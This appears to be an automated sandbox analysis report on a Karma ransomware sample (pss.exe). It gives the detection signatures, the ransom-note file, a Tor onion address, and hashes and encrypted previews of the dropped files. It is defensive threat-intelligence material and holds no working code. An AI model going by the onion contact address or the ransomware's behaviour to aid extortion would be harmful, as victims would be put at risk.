behaviorgraph top1 signatures2 2 Behavior Graph ID: 467911 Sample: pss.exe Startdate: 19/08/2021 Architecture: WINDOWS Score: 68 25 Multi AV Scanner detection for submitted file 2->25 27 Found Tor onion address 2->27 6 pss.exe 103 2->6         started        process3 file4 15 C:\Users\user\KARMA-ENCRYPTED.txt, ASCII 6->15 dropped 17 C:\Users\user\Desktop\SQSJKEBWDT.jpg, data 6->17 dropped 19 C:\Users\user\Desktop19VWZAPQSQL.pdf, data 6->19 dropped 21 57 other files (51 malicious) 6->21 dropped 29 Writes a notice file (html or txt) to demand a ransom 6->29 31 May encrypt documents and pictures (Ransomware) 6->31 33 Writes many files with high entropy 6->33 35 Modifies existing user documents (likely ransomware behavior) 6->35 10 WerFault.exe 23 10 6->10         started        13 conhost.exe 6->13         started        signatures5 process6 file7 23 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 10->23 dropped

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
pss.exe49%VirustotalBrowse
pss.exe46%ReversingLabsWin32.Ransomware.Karma

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/1%VirustotalBrowse
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/KARMA-ENCRYPTED.txt68.0.drtrue
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:467911
Start date:19.08.2021
Start time:05:59:59
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 3s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:pss.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.rans.evad.winEXE@3/386@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 100%)
  • Quality average: 85.2%
  • Quality standard deviation: 14.5%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 23.211.6.115, 13.89.179.12
  • Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, onedsblobprdcus17.centralus.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.

Simulations

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\JSCache\GlobData.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):91
Entropy (8bit):6.021369777490013
Encrypted:false
SSDEEP:3:OwciWC5qPWl3zw3DkSNI0cB/JF:SG33bSNKZJF
MD5:64DF21A61C35870DC56FCC0930CFDCAA
SHA1:31F84225755338C7BC9D509A5AD4AE1608ECBF01
SHA-256:14061BAEB91E88CC9F57EC449EABA09E9AF5DFC976E83CFA1FC6AC87F6A7A122
SHA-512:9D263283287D6BBE7B9491EF6486828EA788E8125CB5974693FDB670CECABD107AAC5A4A21B35C654A24B5AE076C91294A6DC2A7C929EA468584B668902218E7
Malicious:false
Reputation:low
Preview: @.......F......'.....:{<.Y......uVN.~..ss...jzY..W..J..N.....KARMA.-..o.e.TsjQg.).d\..h.
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\JSCache\GlobSettings.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.161530687680467
Encrypted:false
SSDEEP:3:XgGa1WEIrE+fT5dYngEtukGg9aUcrLgn:XgwZrj7nYnJtukG9In
MD5:CD12F2ED0AE2114FA657FCA5D1878F9B
SHA1:30CFB72690CEEC8953B712C32FC8A23DE70B4776
SHA-256:F947B5D2613586C3D99145D791E2CE3B62F560C7AAD0F380C5E3EC68FE75A466
SHA-512:E0E7FF717E00A232F13E8DB47D5C08EF742813D959C6A52E7F36907EFC62FB89B6DE2489C14BB24B33ECB41321067EA311E3616163B9A68183884CC850ABAA0F
Malicious:false
Reputation:low
Preview: ...oG.i.....3J.|F..(...............}.n.F......&......s...KARMA....a.&ZCj...W..$.#...
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):706
Entropy (8bit):7.676113993274977
Encrypted:false
SSDEEP:12:pl5RH4Iorq0Td+K0taPEopf89fxdLmyWTn7lePosnF++HzUO8JulnlCH:pnRHUq0Td/N8/NxZFWV6nxHz8mQ
MD5:27C1477E5AA3CE03EAA01722A4595F57
SHA1:E292573EE78431A8D2A89983C802E357F2A49777
SHA-256:019883A24CD275D8454B3320C8F76DFA9CFB5BE4CBC1732A3205DAA3A9960C06
SHA-512:1552E5C39809206D4FB03C5763DE5DF0B8A1711811E67BDB049B000633C33B890ED376A0E3C73B413018E35BC9BBA921CA15E32873BF33D3C267717DB002E1BB
Malicious:false
Reputation:low
Preview: .).y.V^E.....q.]IH<..i.Q._YlA...`T..S....X.:......`|`.|M.5.?...KARMA.g4.;`..4.:..M....;K...[GZ.."....8..W.r...E.p....lO.q.RHu.......c....= ox.]....'.......T1x..R&~v.H..3o....!.\...1..Q).D..N...m_...A....(..]c..!+m.*5g..b/.:.Cl]...e...5 h....(.cdqE.8...fh.Rg^Z[.d.gg&&*..x..'..;...W34=..S..H....R9E.....j5I#.{.....T.EZ.CW......d.&wS.v...W.y.Gq..$..o{.aHn..A.....3.....n.HF)...D.fX...9...@#...*....N....pDs..D.......f.[....%.._@........l={>.]...<8Ps7B....Jnv..7-.1b.k.y...Pq....N.fh@.f5'..g.+i..}'<..(D(m....G.....>.O.k.Y..>.w...h.z..OZO..w.D. ...{S[>.~...d.Y.a#&.}.;...`...)e....H..i....U...&...}.........._.K.`C..Q``.....R..o......q..3X|....n.C.......;.*.u...o....a{...g_yY.= ..
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):494
Entropy (8bit):7.558060732139472
Encrypted:false
SSDEEP:12:pbwoRMeuEnMrrqxh2m+MLvi5sUKFbbNp8krOdIQIf3Xcv7H9Hn:bRPiQLvijKfOa5fHcv7H9Hn
MD5:0070F4B1962CA5A369B8650C6767E868
SHA1:0736799BDBDE98209CAFF77EFACFC9D90A624086
SHA-256:FDAA94EBA1AB85FC395DB5B8631E17A0FA2B1A2CAC7684DD36EAEA1E343DF8A1
SHA-512:5E24E1177B2776EE7CC9BEF90519B3FEDE31DF770197728AA51A94E8F0E2E98435DCD93FBC1778ECDE610B8E7F25745AC054FB4879E44E50FE66EFB68AB0A38E
Malicious:false
Reputation:low
Preview: .\9o.._.HU....E.....g4|..k......y..Q.uG.._....wYB K.&......M....KARMA...6W....?Y.....e#y.....<...3...`.P...k......}H8J.....&..XA3..Sc..3m.......4.0.D..f..m......5.r3..m.....@F..m.vD.....[.-.>..gy..Y..!9.hB...;..d...YM....383.q.?'..D7.....{j.....W..f..G..Ti.l.....6..<.\..ld.@.g...O6.H..bZ?M^.....-d..X+d....oUF.S..+..M..$........K..@w....%.j.x8..W..e.."N..^._...qS?.-.{.L...(.`.".YI'z%.?...........T{%.@p..t.T%.+. ..'.'...=..@....N....&..R.....mD(O..!....i..0....#4Dt.c.B
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_store.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):10309
Entropy (8bit):7.983321589869112
Encrypted:false
SSDEEP:192:V2amqZFwTySg9RM6tq10jXPXOHz2vwkDOfmWo03cUMl+NJYQojkGhIiHbjPgQr:jXZGmSgbHzPRvBWo0sb+NKQMFhIwfhr
MD5:AF58F3F5B3D91A3A4D1FEFFEC2A56E6A
SHA1:E75F37F8C9ED8CE71B0FEF16174BC33C73CBEF3D
SHA-256:15AEEF602F18308D23E9F411B6B8816E0CF381F6E99FC48E08E84330B34194A9
SHA-512:74E8B219D5262FCC8E4CB0B34B5BA0317F53798D6321AA00E3850E08647746A6854DA0150433BBF6964EFA97D358C0EDC6577459171A5F8608D50CC913D827A8
Malicious:false
Reputation:low
Preview: h.O...iup.C.`. .... DaR......._.@+&..^~hQ."..O..qX.@.q...(...KARMA,^6....H........1^....f3-#78....n60+.~%......e.sm....../X.<..3.......N..N...OA.h......'....In.L..|...G.....t.-?nl...x.....).....rCO.}.s.)8..?Fl+.^..S..w..O..R^.....j..e.6..Y. .r.Vq.._f.z....Ex.T!4.h.75..v.z.2.cy..^EB...X.Hk.<K.. ..l...b......&.......3.x..{Q.....N.._.Y...?....d>...+....sT.Au3.8.q..........f%....9..>,.Z.g....L...g.i..R..a..Xh...a!.#g3....k..&..<..<..`.:....D........K.....eD?.....:bl..+qm:..<P..7...a.u.~%72.c.."..M.:..w.Ux..$2...qJH....!xS......."..:[..M..d.k.@..e.$I.)....n..Q..?Y..x.....R.......=.....m.....]....>.vu.?s.....B[ .....G....]w...^h&0..mj:.G..NHt~I.|...k....)....d.e...fw|.r.l..P..nK3x./......n.nC..&%..c.@7....8.n.{.P..w.E..gI.....5......7.,.D...--.QVg..g..^b..E..g..b....S.....<....N....X.!.!...k.Q[/;K.Ek8B...d..+y-R..6......2+Hc.K.0.lX97=...LC!..}...%..>6pT.@...-\.S....`.}x....r.......@.K..v+Q..@6....zW....J..} ....n...;7.....4\./..).....
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_storei.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):24221
Entropy (8bit):7.992296279927023
Encrypted:true
SSDEEP:384:tSwQ7lPUDLITUGxBvTBEhieEFt+ZTWxFE0cQMb7MMak+GpV3WNgRipZh:tI7NUfITUev9EhieoIZyxa0cQMb7M4+F
MD5:F3F529FA965732B2EB5D60AE102A1921
SHA1:B8748E98762FE2115807715C48A6FA3395FBF81B
SHA-256:5E6F12E11291DE623C88D7788A31E955B17E7CC0802137F10401EBC7C585DE8B
SHA-512:B33C72ACD28FDDB4000309330A588BBB20CC5B245283D5E5EEF41090D70FCEA09B53DF2D7D8B74ED69F0932798C35C58BB29BA6741689569C63BC7500796A747
Malicious:true
Reputation:low
Preview: l..4..`.......b.+.H..8n.d..`.....r)..5...N...N.I+U.h..........KARMA$-..3.fxc..nK.8...b.....V...Z......}_.N....*.....<]....L...Q....g..W...I..0.....=....X.3.......^..$.zv....Wbz.......!.*.....,..LTY....f.o!g..U.<}...U....>..,......8...c,....Z..*,.......*..|Q.!4f.nf..B.m.......B2p..'.....]......t...s....fg.A.Z....H.w..=/....y|1y4.ewHE.?.h..hv.K3..h....P..L.....Fu....b.>%...".7...w...f..qt....vD.....[..Y...4..#...z....Xl..X../.X......D....../..5.7.o'iN..?^....i..'...N...F.n..<...V..h..g.:.+.s/.7.4|*...P.......'..9..n...^).8.\...M/..wX.*ri.o...z|.z..^.Q....i..8..<.,u,...<.6.X.*...5.@.`+..S.Z..Q.6...c`.RrM.j..}6..V..G...0.z..zy...Y.Y.8...........he..<.I.....#o/-~/..D.d..UC]Pp./...G.Cq....;..Q"X$..u.g..l~.Tu.|.....IS...^..iB.I{3.'l<0..x..n}I...y.n.f3...k.<-g....e.v...4.1,...5.l.Z.67.K....V.W.BUc..bQt..J.6.....(...ZN...V....<ub...#......HX....cKQ..F.@...2.CN..*..Y.P~vt...W.....6.\*...3.....b..>].......CE.....PaNE].A3.b_.....0.>...`....
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_storek.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):333
Entropy (8bit):7.270414649645231
Encrypted:false
SSDEEP:6:Iz4rNi5aLuXAUQc+3iu9ot2edvseMppST/4alOaCjWXsa/64IUVf:Iz4ZCaqQJc+3it22keN4aIaCRaifif
MD5:F4C528871687B7AE967D2CFF2C3C2A4A
SHA1:2EB78FBE13E92FFAB4642DBB4AEEAAFBCFD71CB5
SHA-256:78BE63CAA9BEA1A2A1CE519976D493747E557553D8DD00DE7BDD361DDAC97535
SHA-512:FFCC133A6C1F38A8A65633953E0782BD9E4880A74D093DA14386EAC867773EC35B46420484BE23C0AFF198A2EE46976980C3C761B2DD6E54F10AA20ACB65309B
Malicious:false
Reputation:low
Preview: .-.z8I..`a.5..q/.(...L;O.8)........8...k."DB.....Oc...[L.?...KARMA($..ii.@...:.r.=..+I..2../......lz{3Z....\!<.<y.Y..,o...=.w.d6..cTE...0.......|d.zf..zm.....}..X...2..,Sg......+7.4M....Rf-.w,....~4..H...I..cF......N..IL.qLL,j..'..3o>....+.....c.f.F&....9~.(5`S'9.s~t...w..^...0.,.,D/...ro.h.8...18........6.9
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\addressbook.acrodata.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):14525
Entropy (8bit):7.987581155052435
Encrypted:false
SSDEEP:192:sQWzXTf5X0KEKN+YeyMEFY9UHjOjQ5QKtloUKM8MaYqtfxPMFApDiCnN8Ir:sQ4fxtY9EZOjQ5QJM8MARdMFIlN8+
MD5:F1263448BD4D95874C438659B4E40651
SHA1:9BDA8D5D96B0A06E29542C9626901CF9412AF4BC
SHA-256:A141BD2875912EC5872BE06F11B45438CED3DC7B873E73DB35571BB53FD0A16C
SHA-512:DB1161F8DD0BD7A18F192929FA0925C243487D2192EF997E56340B087D86B913C86FA5A4BF5E2F83FEDB270705B9A460E1CE8991939983B60E781032B717EE59
Malicious:false
Reputation:low
Preview: .Z.vk]Z{k-.|h8.h....s..<.....T.G..s....h.c..7........L...KARMA.."......nc.`.i..\..O..2..j...$...K:.b]..R....... ...r..G..N.UD.....z.w.$.......|....}.....rA]..$~.N...zx.<..2....l..Z.@v..n8.ur-.........!o..-...3..e...)......<}1=.4...|i...~l.^.s/U..C.......%.!.l(..*..Z.....-..4-...W..S...A.0.k........}..y.=..\1.;..}..3....@R...^.b.+..."...V1e.95..>r.E.2.]E.Lw.(P.P....Xn...../.~..~_..q1....S;.|..0.~6...o.p7Vy&.:i5D..K.9:.....&K..Q..-..3[.A^.....c.t.).~.W.|.L%..PR.y0..,.k......&r-..w...6STJ.}..3]......;..X"F..I..d.bY.`g.'.I..!.w..*D.=:J........j..........9w:....Kj'.Y.C...KZ.o1.:.X..,..B..1.~......!.b....q.J..X......6..pjz..y..._*....b-.OqH...\.......X5..z.......<#..H..P..W."..rg.....>Y...G(^.m.R..o..=....O..U..j.,.e..$mQ..l.....x9P..;Ft........>...0..#..?Ro.pr..-.K+.l`.....~.5.9....v.......-...T.d)....{?1.m.NL.P='....~...j....b..m...1=j.7GQ..3.1.sL.7Q...f..y.:ZY..t._.svf....d..1...-...]...D..*.G=..MB.y..#....?..T..:...%....,.|.k"L..
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:Dyalog APL mapped file 32-bit version 246.248
Category:dropped
Size (bytes):333671
Entropy (8bit):7.999411716359313
Encrypted:true
SSDEEP:6144:iC58nTaO8FSkZSv4xtIbbubuFZofOHAfob9LZWTf35QFjRHQImmmz2F9RQe32QO:Ma3ZcRbvFZGEbeTf35QFj+2C2zP29
MD5:5EE366E680A23D033F0E975E84F5CABD
SHA1:5015466CEC47A7D181BA22958593498F58E7FA73
SHA-256:147107D67F324D9298D2651B0A1B8466AC9D61C43613EEE17FA381A11A2FD0D0
SHA-512:C64E03B73F132C4BBD387FA120FE0A7D4667BF905BD6EE714D139882223373951E84046ADF2D60BBEDC512CCB4330FC21C29453FBC9AAA2C3B25D31E20C93AF3
Malicious:true
Reputation:low
Preview: ....P._p..E...j..U...9...........I.......m.....;.0.ou..n.O...KARMA.XGXV.A..]....L.u,Z...O.&2*.z."_Ed..S...3.@.$.TB..W.9.!khg.U,-..M..c..:...X.3..m...po..{..E..;..h(.]v._y..........K.FH...|......id...#...^.*H^zx.].#<....^..e.mL...OP7x8[..J..TZ...U..n.........N....{.g...c..B...,M#A@....#..kj.YK.^.g..l.....p...0..Bq.Tr.G..6...bi...#zk.8...;Cd..h.3?4.;.\6u..MP...k..........P.^..a]...+.E1.a.wn:G...gh.../...p.......x'......^z4qs.....>I...!..v.....PZql.%3yRD........i`+^..\...j}?.G.=.e.....[......'..e...7(^4......pqK..$........O.....y....:.O..#..Z3._.C-%.Fg"..".?6..s..$.i..6.-Q.(-....<.le...iC...~U...$0i/..>..$j...C#..K%.KR...J.)y....T.<o...bY...3m/..............F...c.8.j.S.a...D.."M^-.....\.a..)....n<.d.....pDi."..,.w_k...v...e.QW.t4b..,...........u...?..3..euq.#..h..ETq...BS.....j....>]ex....~..x..}l....{El.~.s.nbF.X...A...A..m..}..../.../......O$....d!..e..+.:.....wYC..H6.w...~....U..Y.mns..Pi2u|..9..+90..P.n.F...?......7/...?......j3...
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\CHICAGO.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):297086
Entropy (8bit):7.999349226696064
Encrypted:true
SSDEEP:6144:fytb6yOflV2OO3L8vyGGc8s8Gc/BiCgKmCOF02v+1QmAwlThuevH7p+mnYyEfg:G6yOfS78VGcGngK7OecC/F51cg
MD5:F18105FC1CC880CAB30822FC0AA2FB6E
SHA1:837B8CFC5528A6C102C51EF32E3DE7440FB35536
SHA-256:4EF9463BC695CDC4CA3D4A60E36A8443C3EA6B8729D3BB63794C5F7343514B20
SHA-512:DA3B73FBF07CC32E8C9ADA1ECD03DB52AD5643563DA54AC71451449A70F79DA9098088C19CCE154C3FDAD4AD80EC882E0E2DD6197FA93319E85C57DE33AAC5FA
Malicious:true
Reputation:low
Preview: ...\;.w.....3`..li.....~..c......O[.....H/..TwY.l.........KARMA...ehy...:kR..u...z..&.Gd...w2w.{~......Z.d.x...v.=....2K.k03.4M!gK.....N/6&...9W.tS...>M....F.3...y_X .mUN.`M.5.xu,.....A.@k.A...*.q.#.^<....o.Y.E.wJ.|.J2.(p..Y......d.\.C\..r.......r*..gD'z..._.......5#%..\.['..,#.ze^G....8......n.@g..O... .d/2t.="...m..P;........9{._.c..m;@&..c*t..3.0.P...*.....m<t%..B.....P..Z..&..cC....,....w*Mq....K..).G.;.E.#We....i}...1.?B:n.la.X.w..M....^.K....qO...>.......gp.s..]:.i=..... Ow.T.K.....i...pY.-.N.=.........>$p...0.E..k./f./F...E..d...."..>:%.Y.y&..:k?}a.pWj7.....1.w._.._9n..4@.!....#K.Ln?......c&...9.f.........Z2..1..z.!9.EH@.-..C.......vF...X'....!@.......O...u."....Dc.<...J.....]...G#.f...._...).i.-.Mb.;.....E..D..9<.bH.3:....AhQ...c..M:...... .C.]0.\.L.?7^]..T.l.|3.5..Z.'..J...K.o...t...8m'...9q!..b..9...e..|9?`.U..N...5.R!:...$$G|..)..,.K.8..,V.{.j$2XO.y.. ..q;5.A.....;....5.y..Z<.D...m...bg.Nmlb..a.5....3...5.,...E..^.......
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GB.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):268739
Entropy (8bit):7.999374762502691
Encrypted:true
SSDEEP:6144:+MBAq/ODsKghS+L5Ghr5vU+ExZlOJAorlY5GMLguvjD:+TMeghghGZlGDxYP0urD
MD5:503CC4377FCEE9A24FF9BB56BCBF65B5
SHA1:F9DD696DF51F11B836D2C3D5B3175A7E9EE8664E
SHA-256:229E30E038556F808367748DE9302F6A5A10E5ED3E8A9C2D9FEC1C4DDB859CA2
SHA-512:8A53DBB3381430E4733E660D39F03A97A438B2E45A0DA8EFF5058776D4DBBCEA530B18C7BF655FEF4A4D3BF8F74F7C483C0A1F007E12870BE951F9FA909632AD
Malicious:true
Reputation:low
Preview: G@I.x(.....Lh..h.d.f........S..}...._.^S.9.\..W....(9'+.....KARMA.B6:!..TN8..........V~.Z..H..m.R..p...&s.Y.l.....8....@E...}....BN..{Z.R..H.Dqo.O..J.......Wf.@..I[...$..za].m....o.q........~.h,......9.-.......Y...S.<./....e.X........|.{.-...r...,6 .$......-p..^....._s.g.t...9o...`g..@..E..?....i.......G...{Qr=...E.......RT.>.z`.e.Kr..M........ ...?...tKl......m<PV......miO...2..... ....6.....I.6... .>..f.......O...Z].:....6.E]Lvp...........GL.....`..w......2w...p.....N...AbK4".#*.*-.S..'...a7G...K.....V.V.%.^D...c........4....q..0.).'.....R.....!.....G...~Z.9...@..1(._{.p..........V{.A>."....$E..y3.A..9..`.i.R.+..?..Mv..<R...<5NuJ..H....%Z......2/e. .i.Q.n.MY..,_E.......T..vR+N.W._E.{..iIU.k!],.!._e'rMGv.a.G...WG:.?q..}#..%]..J....O....E8x.w.F.>..j....>X.J..+.<6d..UO.ME.3...:].|)..s.1cV.m.@h.b..k.x.b.....N.q....Ab..{>.[ue..w&....)>0.4..v*.....`..`...8..@.....*plQ....2..<....,jD.(g.in...._jO.|.[....tW;f...4....2Wl@Mus~.vT...q(Tu.@
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostName.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):256427
Entropy (8bit):7.999256064752385
Encrypted:true
SSDEEP:6144:Qu7OKJN8xHRaFVpM0WO83y50rVAyloDS9/FyFhbi2d18e:pOBHg7TWhyur2yloW/g+s18e
MD5:D95370244700D7A9BB9AA12E6B4A0179
SHA1:316F0B4CD045CDB994DEBC41E2E5E9196E819656
SHA-256:C2E0B5BA837B101FBB82136543C636C57210CD608F3AB59A5FF7DE77CFE5E500
SHA-512:5102E14FDD8C97BDEDCA80750361A42B6D954EF7D45E858430E91E284E9D819251AAFAABB95C5226F6ECC8494DE9818600A24929400CD7963FC3380F8D06ED4D
Malicious:true
Reputation:low
Preview: h.....b.JB=..k'./q.R...,$'......s..tiG......7a.k.Hv......KARMA..U...G%...L.~[9..2P......g-...;...k.cO.;.b.b...S.p.3.h......9..gUoxF1..X6......Dn..1.....). .I.<e.M.*O...`W1.Xs.....F.\+.a.]1y.u.x..7o.n..|...L.i..I.Q..F.Y%r..2..J.1.z<.d..d..<t.V..~k..(..N..*G>...h....J....z&-..[...t...@-...y).J&4..*..R.3.A2...D.....`2....h...8...2.g....aS.I..1Y.<..a.=...f....2.\...'..l<..uT..Z:c`^U3.[..a>..&...0...h.\.H.MUTL..$b.'.S....o..B....1..jE<..H}...|R!....bDM...h..pw..z..s..sd..Y....H.rD.)..r.4t..vo..h...-......]/s..[...V...x..._AK....X..bE..(6D...NJ.&.y.8.b....0I..r...xG.....A...wt.@./...l.E.y.&.9..%..+["<=..A....rFL..^TX.H.,.q..E(..~^q1...!pFu.@j4*.n|;/c`h.M.iF..l..z`..........Z..Yo."./P...@]o..^i.Z|).c{...x.V(.Knt.....Z...$^[.%.]..O.....f......B7..3.....R..a....;.|..*.]p.(m....uT..I.XK...P..5h..E....)...r`..`....i..Sycl.l..;...Z.L..qF+...c..."..N3.s..>.0..w'........H6]F.......J.i...J...9.`.k..&..x.T4..#.....,.. .....8.....N..xP.j...A.v....CKDH......
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostTitle.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251518
Entropy (8bit):7.999383827401665
Encrypted:true
SSDEEP:6144:Wwnqx5ofZjF7pAG+Wm6vzuRtOB+ugYxoEjsXQ/ZOwgEdxlTW251U:WXx5MJF7iYEOB+uH7sg/9xBpI
MD5:66C90CE9DC264B54C9DD174A1CDED7F4
SHA1:5E6C3B6DE3C68CF67B7BB11D6DA03848D17E10D7
SHA-256:3B3758AC0F2AD447AB851DD02496769A8A827D132A4761C3108E19488FEA49B6
SHA-512:2013253BFD3F0AC66450A391BB11BB3E95C7DC118DE8F1E38859C6BD4DAF54FCB32D9747E92473710108ADEEFE75BD10E171379A2791DA0F523CF175A7B43DC4
Malicious:true
Reputation:low
Preview: Y........X.A....W.nM.~.yP.g...b..&..g...k...`*.DE..P2...S[i...KARMA.J,.....q..3.. c|..'...I.B.((.]9.......$..D....w........F#7&,...^N....C.PQ7U[Q...v\.kC......WM..M.C%.......f...2."..s.\...Q.P."A...O......w.Ep.....\'G.0.aa.~1.....K...Q.H.....\..+..=~.O..2B..?...Q..9...;.<i.Q.2..........<...D.P./..E...3.5t.?.]b........N.....y...q...1.bBy".=D.#BS..x....@..b..q?p...=<2s.6..CX.8.._..i...WAB49.......I.....$...<...d.\.ut.v}.....;..x...X....._.....o..y.VP1.@...>.....$O9.i.;.y ......NTi..:.X.&2o4..o.m..r@~...\..".....u.^..e...%...}|\...R..m.e<...,.....r@Zh]y..zS...d...d....7..H?.\6oZ..D}..#...p12~...u......c.{.....s....d.r5.......N.$....Q(~.....(.....+^..%>...6.0...B....W....~B.1.I...c....o........d....../>.vP.....V..2... .n.Ug/...i]I.9l!FG..S<.B5".^..8.KV.Y..k.(..c..'.=.......KB....M..:.66......Yba.^.....X...@1\>D..K..7....q.d.Y.$g:GN".S..K.........>w:...a......k...kJ.5i..]$.<..=.s....gS...ZA.~...n..Kg^....Q..V...#.A.j.....C.[.cIT-]=.q.....
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):284871
Entropy (8bit):7.99924388201897
Encrypted:true
SSDEEP:6144:TtD8ARsB2tQNHwok+IBqyHwLGyWM8X2qUWL3170HlmONeMCYDeBn:TKAuu5oZIBqy6GytGJ0HlmIc
MD5:F4BBDD6CD7E032CD312D35232A3FCC8A
SHA1:B70EB878D86CE4D2D8A1E05BF8144EC02466ACDD
SHA-256:7EAD398F5B22612495EDEDFB40143E8C0E093E61F0EDE08686F2872C75F6AF48
SHA-512:2D5B8905FD1396D182212CB0865D23AC1B89AF751DB3AD44D870FD52B824511A8F1F5E1FF6D90DBC09867E95398AB6457241B0ABBFD14BC99167D36E2CB37A8F
Malicious:true
Reputation:low
Preview: o..,.=`.....C.@R..\.t.WL...4.^.Rm.Bg.#...I[...9/.%...L.5...KARMA.f....I......l..d..op.y.q.b.<.....D..)"...[H..od...)G...=.B.HEg:V2l=.b!....I..-.I..u. ....JaA._...hY..Q..J..C..pM.2.}e.C..d.o.N...q7.[.%P.c..Y...Y..c.......7.....Bu.{.]...Th..........x..j-..p.......4..&......H....ht...pedJT.1.!...q...%.8...u"C.Vb...q]..%0E..X4SQ...=.9.+eU....u...zk0..[.8di.6h...zK.yq~ih..K......u~.............<...wD.Kb...Zu.%.^H...g.x...^s?R..,..w..&.f8-...&k\.......l......B.....th~.9...L...<..{...k?.a/....i-..G{..Y........Z.ZM...G(.s.u.7...@......y..KY...b..V...)........q..;.gee...D9z...^.gk.NV......?..yc)..OV.1.{.y.=q..|.,*.bA..*Xx..iz..5......Uo....aH.4..z...(....E..$.'[.zly.:jEh.......R.M.c.#n6?.Y.o._..).z...B...@...Q.o...#t6.q..j.[...u..lJ....,'..S .............]\.sCL.V.....po.f@.....O....`..Po.&kYG.H2..<y~...{#r-f..mV..+....O?..I..T..w3..k.......Spc.lC.aZ...F.vq.j...e.W......v.9.....8e..o..U..}.....Y..<..W....6.-3.....|..D.0&{FoZbiS...
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.KARMA (copy)
